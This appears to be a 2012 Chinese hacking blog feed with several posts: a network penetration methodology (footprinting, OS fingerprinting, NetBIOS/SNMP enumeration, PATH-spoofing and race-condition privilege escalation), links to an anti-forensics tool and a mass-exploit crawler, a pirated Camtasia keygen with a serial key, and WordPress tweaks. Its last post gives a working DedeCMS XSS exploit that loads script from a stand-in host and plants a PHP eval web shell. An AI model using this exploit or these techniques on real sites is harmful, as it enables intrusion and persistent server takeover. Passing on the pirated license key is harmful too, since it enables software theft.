体验盒子

我有一条金闪闪的游泳裤

Adoing — Wed, 22 Feb 2012 19:13:18 +0800

萌系滴~欢乐了！

网络渗透思路 Network penetration ideas

Adoing — Tue, 21 Feb 2012 10:43:32 +0800

下面的文章对于网络渗透,提供了一些很好的思路.

一，踩点

踩点可以了解目标主机和网络的一些基本的安全信息，主要有；

1，管理员联系信息，电话号，传真号；

2，IP地址范围；

3，DNS服务器；

4，邮件服务器。

相关工具介绍：

UNIX下的：fping&gping

WINDOWS下：Pinger 特点：速度快，多线程。

2，对于外部网络，可用类型也很多，涉及到的原理也有很多，例如：TCP扫描，UD
P扫描，

其实我是很不愿意用扫描工具的，很容易使对方感觉到入侵事件的发生，不论是防
火墙还是入侵检测系统都会或多或少的留下我们的脚印，如果遇到一个勤快的管理
员的话，那么这次入侵很可能以失败告终。

但使用与否依各个喜好而定了：），有时候我们在测试网络或者主机的安全性时，
就不能忽视他的存在了，首先，安全测试不是入侵，全面的测试对抵御黑客和蠕虫
的攻击是必要的，在这里推荐的端口扫描工具是NMAP，因为他带有躲避IDS检测的机
制，重组了TCP的三次握手机制，慢扫描机制等等都是其他扫描工具无法比拟的，U
DP扫描是很不可靠的，原因有下几点：

这种扫描依靠ICMP端口不可达消息,如果发送端给目标一个感兴趣的端口发送了一个
UDP数据包后，没有收到ICMP端口不可打消息，那么我们认为该端口处于打开状态。

不可靠的原因：

1，路由器可能丢弃UDP分组；

2，很多的UDP服务不也不产生响应；

3，防火墙的常规配置是丢弃UDP分组（除DNS外）；

4，休眠状态的UDP端口是不会发送一个ICMP端口不可到达消息。

还有的扫描工具就是弱点扫描工具，这些工具综合各种漏洞信息构造漏洞数据库，
去探究存在漏洞没有打补丁的主机,当然也有针对特定漏洞的检测发现工具（脚本小
子能用，网络安全人员也弄用–双刃剑-：）

这里详细介绍对目标操作系统类型的检测原理：

Telnet标识和TCP/IP堆栈指纹：

1，网上许多的系统可以直接Telnet到目标，大多会返回欢迎信息的，返回的信息包
含了该端口所对应的服务软件的版本号，这个对于寻找这个版本的软件的漏洞很重
要，如果对方开了Telnet，那么可以直接得到对方的系统类型和版本号，这个对于
挖掘系统的漏洞很重要（对于溢出来说，不同版本的系统和语言版本的系统来说，
RET地址，JMP ESP，地址是不同的）。

2，如今越来越多的管理员懂的了关闭功能标志，甚至提供伪造的欢迎信息。那么T
CP/IP堆栈指纹是区分不同系统的好方法。

1，FIN扫描

给打开的端口发送FIN包，RFC 793规定不返回任何响应，例外的系统是： MS Wind
ows,BSDI,CISCO,HP/UX,MVS和IRIX都返回一个RESET包。

2，TCP初始序列号（ISN）采样

这种方法利用了在实现TCP连接时使用不同的ISN模式识别系统，可以分成多种模式
：传统的64K增加（旧

UNIX OS），随机增加（新版的Solaris,IRIX,FreeBSD,Digital UNIX和Cray等），
真正随机（Linux 2.0.*,OpenVMS和新版AIX等），Windows系统使用所谓的”时间依
赖性”模型，即ISN的增加同某一个短固定的时间间隔有关系，有些主机始终使用固
定的ISN，例如3COM集线器（使用0×803)和AppleLaserWriter打印机（0xC7001）。

3，不分片位

目前许多系统在他们发送的包中使用IP”不分片”位，这主要是想获得好的运行性
能，不过也不是所有的操作系统都有此功能，即使有，其实现的方式可能也不同。
因此利用次位或许有利于我们收集更多的有关目标OS的信息。

4，TCP初始窗

TCP初始窗只是简单地测试返回包的窗口尺寸。Queso和Nmap可以对实际的窗口进行
窗口跟踪。在很多操作系统中是一个常数。例如：AIX是唯一使用0x3F25的操作系统
。对于完全重新编写代码的NT 5的TCP堆栈，使用0x402E.

5,ACK值

如果发送一个FIN|PSH|URG，许多操作系统设置ACK等于初始序列号，而Windows和某
些打印机将发送seq+1.如果发送一个SYN|FIN|PSH|URG到打开的端口，不同的Windo
ws系统的实现将很不一致，有时返回seq,有时返回seq+1,甚至返回完全随机的数值
。

6，ICMP错误消息机制

某些操作系统按照RFC 1812的建议，限制不同错误消息的发送速率。例如：Linux内
核（在net/ipv4/icmp.h中定义）限制目标不可到达消息的产生速率为4秒种内80个
，如果超过这个限制将有1/4的惩罚。测试方法是发送一大串包到某些随机选取的高
端口，然后计算返回的不可到达包的数目。

7，ICMP消息引用（Message Quoting)

RFC规定：ICMP错误消息将引用一小部分导致错误消息包的ICMP消息内容。对于端口
不可达消息，几乎所有的实现都只发送所需要的IP头+8字节。不过Solaris发送的内
容更多，而Linux发送的东西最多。这就是我们识别没有打开任何端口的Linux和So
laris主机。

8，ICMP错误消息回射完整性

主机对端口不可打错误消息将送回一小部分于是消息的内容。某些机器送回的包中
包括的协议头部分已经被改变。例如，AIX和BSDI送回的IP总长度是20字节。而系统
BSDI，FreeBSD,OpenBSD,ULTRIX和VAXen则将原样送回你所发送的IP标识符。某些系
统（AIX和FreeBSD等）将送回不一致或等于0的校验和。这同样适用于UDP校验和。
Nmap对ICMP错误消息包进行九种不同的测试以标识系统之间的微笑差别。

9，TCP选项

是实现TCP/IP协议时可选的一个部分功能，这跟不同的系统实现有关，这些选项都
是挖掘可用信息的好方法。原因是：

1，他们都是可选项，不是所有主机都可以实现的；

2，如果你所发送的包中对某个选项进行了设置，只要目标支持，那么目标主机就返
回此选项；

3，可以在包中设置所有的选项进行测试。

例如：Nmap在每个探测包中设置所有的选项来进行测试：

Windows Scale=10;NOP;Max Segment Size=265;Timestamp;End of Ops;

从返回的的包中查看这些选项，就知道了什么系统支持他们。

还有一种被动操作系统识别方法，就是监控不同系统之间网络包的情况来判断目标
的操作系统类型，siphon被用来进行这方面的测试，这个工作原理如下：

签名：

主要TCP的四个字段判断：

1，TTL：出站的包的存活时间；

2，Window size：窗口大小；

3，DF：是否设置了不准分片位；

4，TOS：是否设置了服务类型。

综合这些信息可以大概判断出目标的系统，但不能%100。

四，查点

利用查点技术可以得到比前面讲的更多更具体的有用信息，例如：帐户信息等。

1，Windows系统查点技术

利用NetBIOS规则，首先介绍NetBIOS,NetBOIS位于TCP/IP之上，定义了多个TCP和U
DP端口。

—-TCP

（1），139：nbsession:NetBOIS会话。

例如：net use //IP/ipc$ ” ” /user:” “.

（2），42：WINS：Windows Internet名字系统（UDP端口也是42）。

—-UDP

（1）137：nbname:名字查询。

例如：nbtstat -A IP //03中显示的不是计算机名就是用户名

（2）138：nbdatagram:UDP数据报服务

例如：net send /d:domain-name “Hello”

得到用户名利用到了IPC$空会话和sid工具。sid工具由两个小工具组成：user2sid
和sid2user.user2sid获得用户名或组名的sid;sid2user则是输入一个sid而获得相
应用户名的和组名，sid就是在创建用户时而创建的，相当于UNIX系统下的UID,WIN
系统权限的检查就是通过对SID的检查的。一个sid是由一长串数字组成的，其中包
括两个部分，前一部分用来唯一标识一个域，后一部分唯一标识一个用户名，这部
分数字被称作rid，既相对标识符，rid有一定的规律，其取值总是从500开始的，超
级管理员的rid总是500，而GUEST用户的rid总是501；而新建立的帐户的rid从1000
开始。

具体的步骤：

c:/net use //IP/ipc$ ” ” /user:” ”

c:/user2sid //IP guest //得到了SID的前半部分

s-1-5-21-1123561945-1580818891-1957994488-501

s是sid的前缀，后面跟的是1表示版本号，5用于标识发放sid的授权实体，5指NT/2
000。21-1123561945-1580818891-1957994488唯一地标识域和工作组。不同的用户
只是最后的相对标识符不一样。现在用sid2user查询系统的用户名了：

c:/sid2user //IP 5 21 1123561945 1580818891 1957994488 500

name is cookie

domain is condor

c:/sid2user //IP 5 21 1123561945 1580818891 1957994488 1001

SNMP查点：通过默认的管理群字符串PUBLIC读取特性，可以得到系统的一些信息，
具体有：接口表，路由表及ARP表，TCP表和UDP表，设备表和存储表，进程表和软件
表，用户表，共享表。

SNMP工具，snmputil.exe

例如：

1，或者网络接口数目：

c:/snmputil get localhost public .1.3.6.1.2.1.2.1.0

2,显示所有的SNMP变量内容

c:/snmputil walk localhost public .1.3

2UNIX类系统的查点技术

1，$showmount -e www.target.com //前提2049号端口开着（NFS）

2，$finger @www.target.com //还有rusers

3, $telnet www.target.com 25

vrfy root //证实是否有root

expn adm

quit

五，具体的分析漏洞

针对特定目标进行了以上分析后，总结出最好的入侵思路，选择入侵工具，做好入
侵的准备工作是必须，有时入侵时间的选择也是很重要的，因为会涉及到正常的公
司网络的正常通信，甚至会使恶意的网络在你入侵测试就发生了，最直接的漏洞利
用方法，我认为是溢出漏洞了，因为他直接就可以得到对方的系统权限，返回一个
和在本地一样的SHELL环境，此时无所不能：

溢出攻击的分类有：

1，WINDOWS下的和UNIN下的

一般原理，就用户提交的参数范围超过了在内存中保存的本地变量的范围，而程序
或者系统并没有对输入的参数进行合理的长度检查，导致了被调用函数的返回地址
被覆盖，如果用一个跳转到我们提交的shellcode的地方的地址代替，那么我们的s
hellcode就可以运行，成功得到了目标的系统权限。

此外还有格式化串漏洞，导致这个漏洞的原因是在处理用户数据的参数时没有过滤
用户提交的，格式化符号，例如%n这个将允许输出的参数的个数保存在内存中，恶
意构造此漏洞用户将会向内存的任何位置写SHELLCODE的地址。

2,常见漏洞类型

UNIX下的本地漏洞很多，挖掘起来也较容易，他主要有以下几种类型：

1，环境欺骗

一般指PATH环境变量的欺骗，就是说如果一个特权的程序执行了一个外部的命令，
那么我们可以简单的构造这个外部命令程序，然后修改PATH使这个特权程序能够去
首先执行我们构造的外部命令程序，而这个外部的命令程序是一个去得SHELL的程序
例如：

bash$cat >ps < >#!/bin/sh

>EOF

而这个特权程序是：

bash$cat >test.c < >int main()

>setuid(0);

>system(“ps -ef”); /*程序调用了外部命令，但没有给出这个命令的绝对路径，
这个是PATH欺骗的前提*/

>EOF

编译后的test文件具有s为，属主是root.这样设置是因为程序test执行时会以root
身份运行特权命令，这样在他运行时由于调用的是我们伪造的ps命令程序，所以会
产生一个root权限的SHELL环境。

2，竞争条件

一般指时序竞争，例如：

fp=fopen(“test.log”,”w+”);

chown(“test.log”,getuid(),getgid());

原理也很简单，就是如果当前的程序运行时权限是euid=root,uid=当前用户，由于
文件test.log在打开会执行将文件的属主改为当前用户，所以我们可以在执行完fo
pen之后，chown之前删了test.log，而创建了一个到/etc/passwd的符号链接，这样
就会将/etc/passwd文件的属主改为当前的用户，当前的用户就可以在passwd文件中
将自己的uid改为0，这样就取得了system权限。

3，溢出和格式串漏洞

导致这些漏洞的数据来源主要是：

1，命令行参数

2，环境变量

3，特定格式文件的读取

4，用户交互十的输入

缓冲溢出的漏洞是有以下一些函数引起的：

1，strcpy

2, strcat

3, sprintf

4, vsprintf

格式化串的漏洞和以下一些函数有关：

1, print/vprintf

2, fprintf/vfprintf

3, sprintf/vsprintf

4, snprintf/vsnprintf

利用工具有objdump,elfedump查看目标是否有不安全的以上不安全的函数，如果有
可以进行黑盒测试，进而进行返汇编分析程序的上下文和执行流程，利用strings可
以静态查找目标的环境变量。

六，攻击WWW

现在的入侵事件，攻击WWW居多，原因也很简单，那就是程序员在编写WEB脚本程序
时更本不注重安全因素，导致了上传shell,提升权限之类的严重后果，入侵渗透测
试主要通过以下几个方面进行测试：

1，搜索SQL注入点；

2，搜索特定目录和文件，例如：上传程序文件，这个利用价值也很大；

3，寻找管理员登陆网页，进行字典或者SQL饶过入侵；

4，寻找WEB程序的源代码，进行漏洞挖掘，主要涉及的漏洞类型有：SQL注入，文件
包含漏洞，目录跳转漏洞，以脚本文件格式保存错误日志漏洞，上传漏洞；

5，在代码审核时，不要忘记对程序员犯的逻辑错误进行查看，例如：函数书写错误

6，总是，漏洞的成因归根到底是由于对用户的输入没有进行严格的过滤。

BackBox Linux 2.01 发布

Adoing — Tue, 21 Feb 2012 10:34:30 +0800

BackBox是基于Ubuntu的发行，它被开发用于网络渗透测试及安全评估。它被设计为快捷且易于使用。它提供了一份最低纲领的但完整的桌面环境，而这得益于它自己的软件仓库，该仓库总是同步到最新版本的、最常用且以合乎道德而闻名的黑客工具。

Pro-actively protect your IT infrastructure with BackBox. It is the perfect security solution; providing pen-testing, incident response, computer forensics, and intelligence gathering tools. The most current release of BackBox Linux includes the latest software solutions for vulnerability analysis/assessment and pen-testing. It is one of the lightest/fastest Linux distros available on the Internet.

它的基础设施,及时保护你BackBox。它具有完善的安全解决方案,提供pen-testing,事件反应,计算机取证和收集情报的工具。最新释放BackBox Linux包括最新的软件解决方案和pen-testing脆弱性分析/评估。这是一个最distros Linux /最快可以在因特网上获得。

下载：http://www.backbox.org/downloads

一款不错的反取证工具

Adoing — Tue, 21 Feb 2012 10:20:09 +0800

http://115.com/file/c2msp634#
反取证工具.rar

php+MySQL程序SQL语句备份数据库

Adoing — Mon, 20 Feb 2012 23:58:05 +0800

说明：使用fopen()函数，不需要select into outfile，所以不需file_priv为Y。填写好数据库，保存为xx.php访问一下即可

程序代码：

<?php
//blackbap.org
$mysql_servername = "localhost";//数据库服务器
$mysql_username = "user";//数据库登陆账户
$mysql_password ="pass";//数据库登陆密码
$mysql_database ="dataname";//数据库名称
$mysql_link=@mysql_connect($mysql_servername , $mysql_username , $mysql_password);
mysql_select_db($mysql_database);
mysql_query("SET NAMES gbk");
$mysql= "";
$q1=mysql_query("show tables");
while($t=mysql_fetch_array($q1)){
  $table=$t[0];
  $q2=mysql_query("show create table `$table`");
  $sql=mysql_fetch_array($q2);
  $mysql.=$sql['Create Table'].";\r\n\r\n";
  $q3=mysql_query("select * from `$table`");
  while($data=mysql_fetch_assoc($q3))
    {
    $keys=array_keys($data);
    $keys=array_map('addslashes',$keys);
    $keys=join('`,`',$keys);    
    $keys="`".$keys."`";
    $vals=array_values($data);
    $vals=array_map('addslashes',$vals);
    $vals=join("','",$vals);
    $vals="'".$vals."'";
    $mysql.="insert into `$table`($keys) values($vals);\r\n";
    }
  $mysql.="\r\n";
}
$filename=date('Ymj').".sql";
$fp = fopen($filename,'w');
fputs($fp,$mysql);
fclose($fp);
echo "<br><center>数据备份成功，数据库文件：".$filename."</center>";
?>

Exps1.0 EXP批量抓站工具

Adoing — Mon, 20 Feb 2012 19:20:58 +0800

没啥说的，很多玩量的必须要收藏的好东西，花了几天修改，还有啥BUG的告诉我,QQ:413783480

附图一张

代码加密了，你们想改名字的就要费心思了

下载地址:9

http://115.com/file/an9bes8z#
Exps_1.0_.rar

使用教程(提议先看使用视频)

http://115.com/file/dplswbdk#

exps_1.0_使用.rar

camtasia studio7.1注册码(注册机)

Adoing — Sun, 19 Feb 2012 17:30:15 +0800

《Camtasia屏幕录像大师》(TechSmith Camtasia Studio)更新v7.1.1/含注册机[压缩包]

Camtasia Studio 7.1注册码
 Camtasia Studio 7.1注册机
 Camtasia Studio 7注册码

中文名: Camtasia屏幕录像大师
英文名: TechSmith Camtasia Studio
资源格式: 压缩包
版本: 更新v7.1.1/含注册机
发行时间: 2012年
制作发行: TechSmith Corporation
地区: 美国
语言: 英文
简介:

网站链接： http://www.techsmith.com/camtasia/
软件介绍：

Camtasia Studio是TechSmith旗下一款专门录制屏幕动作的工具，它能在任何颜色模式下轻松地记录屏幕动作，包括影像、音效、鼠标移动轨迹、解说声音等等，另外，它还具有及时播放和编辑压缩的功能，可对视频片段进行剪接、添加转场效果。

它输出的文件格式很多，包括MP4、AVI、WMV、M4V、CAMV、MOV、RM、GIF动画等多种常见格式，是制作视频演示的绝佳工具。 TechSmith还专门对Codec进行开发，研究开发了属于自己的一套压缩编码算法，叫做"TSCC" (TechSmith Screen Capture Codec)，专门用于对动态影像的编码！

与简单易用的 DemoCreator 相比，Camtasia Studio显得更为专业，可控性更多，支持输出的格式也多，尤其是它的编辑功能，可以编辑音频、缩放局部画面、插图、设置过渡效果及画中画效果等等，很有特色，且支持录制PowerPoint。

下载地址：

ed2k://|file|%5BCamtasia%E5%B1%8F%E5%B9%95%E5%BD%95%E5%83%8F%E5%A4%A7%E5%B8%88%5D.Camtasia.Studio.v7.1.0.1631.Incl.Keygen-MESMERiZE.zip|179466515|8b762aab4de7921f78033ff2fe8d8779|h=y7c72qhiqq5vuubmy46dcshtn5xl3ksl|/

安装方法：把一大堆压缩包解压到一个文件夹里，之后点击mesmerize.r00，解压里面的Camtasia.msi即可安装！注册机在mesmerize.rar里！

或者您也可单独下载注册机程序：Camtasia.Studio.keygen.zip

上边的包内含有注册机，或直接使用下边的注册码
Name：www.uedbox.com
key：9CRAA-5WCCL-H89Z8-88G2M-7R9B4

wp-codebox添加后台按钮

Adoing — Tue, 14 Feb 2012 23:39:28 +0800

修改步骤：

１、在插入代码前，将wordpress 编辑器切换为“HTML编辑”模式；
２、因为在 Pre 标签里再贴 Pre 标签就会出问题，所以请将本站实例代码中的 xpre 替换为 pre；
３、 Lang=”" 这里可以修改为你喜欢的语言，当然先留空到时候再填也可以；
４、修改 wp-includes/js/quicktags.js 这个文件;

先找到这句代码

1	edButtons[edButtons.length]=new edButton("ed_code","code","<code>","</code>","c");

然后再上面代码后面添加下面代码

edButtons[edButtons.length]=
new edButton("ed_pre_php","pre_php","n","n","p",-1);
edButtons[edButtons.length]=
new edButton("ed_pre_css","pre_css","n","n","pp",-1);
edButtons[edButtons.length]=
new edButton("ed_pre_js","pre_js","n","n","ppp",-1);

再找到这句代码

1	j.Buttons[j.Buttons.length]=new edButton(a+"_code","code","<code>","</code>","c");

再在上面代码下面添加以下代码

[j.Buttons.length] =
    new edButton("ed_pre_php", "pre_php", "<xpre lang='php' line='1' file='code.txt' colla='+'>n", "n</xpre>", "p", -1);
    j.Buttons[j.Buttons.length] =
    new edButton("ed_pre_css", "pre_css", "<xpre lang='css' line='1' file='code.txt' colla='+'>n", "n</xpre>", "pp", -1);
    j.Buttons[j.Buttons.length] =
    new edButton("ed_pre_js", "pre_js", "<xpre lang='JavaScript' line='1' file='code.txt' colla='+'>n", "n</xpre>", "ppp", -1);

修改好了，看下后台编辑吧！

好了，看下后台吧：

wp-codebox解决html代码高亮

Adoing — Tue, 14 Feb 2012 23:09:54 +0800

使用wp-codebox遇到个问题就是直接打lang=”html”，html根本没有带上高亮的效果。
网上GOOGLE下，原来wp-codebox高亮是使用的是GeSHi – Generic Syntax Highlighter（http://qbnz.com/highlighter/）
GeSHi对html的解释是html4strict
因此我们只需要把 lang=”html” -> lang=”html4strict” 就即可高亮。

注：此文章为个人记录贴，遇到这问题几次了每次都要重查，索性直接贴上来了，以后忘记了直接站内搜索！

DEDECMS XSS GETSHeLL 通杀所有版本

Adoing — Tue, 14 Feb 2012 22:58:06 +0800

利用条件：开启注册&&开启投稿
方法：注册会员 -> 发表文章：内容输入

1	<style>@import´http://xxx.com/xss.css´;</style>

xss.css内容：

1	body{background-image:url(´javascript:document.write(“<script src=http://xxx.com/logo.jpg></script>”)´)}

logo.jpg内容：

var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType(´text/xml´);
}
} else if(window.ActiveXObject) {
var versions = [´Microsoft.XMLHTTP´, ´MSXML.XMLHTTP´, ´Microsoft.XMLHTTP´, ´Msxml2.XMLHTTP.7.0´,´Msxml2.XMLHTTP.6.0´,´Msxml2.XMLHTTP.5.0´, ´Msxml2.XMLHTTP.4.0´, ´MSXML2.XMLHTTP.3.0´, ´MSXML2.XMLHTTP´];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
xmlhttp=request;
function getFolder( url ){
obj = url.split(´/´)
return obj[obj.length-2]
}
oUrl = top.location.href;
u = getFolder(oUrl);
add_admin();
function add_admin(){
var url= “/”+u+”/sys_sql_query.php”;
var params =”fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=%3C%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++”;
xmlhttp.open(“POST”, url, true);
xmlhttp.setRequestHeader(“Content-type”, “application/x-www-form-urlencoded”);
xmlhttp.setRequestHeader(“Content-length”, params.length);
xmlhttp.setRequestHeader(“Connection”, “Keep-Alive”);
xmlhttp.send(params);
}

管理员后台访问或者审核或者保持登陆状态进行前台访问，会在data目录下生成一句话木马haris.php，密码cmd
记住这个js脚本吧，get post cookies都可以用这种模式。
这个ajax写得很完善.(新浪蠕虫依赖jquery直接使用ajax).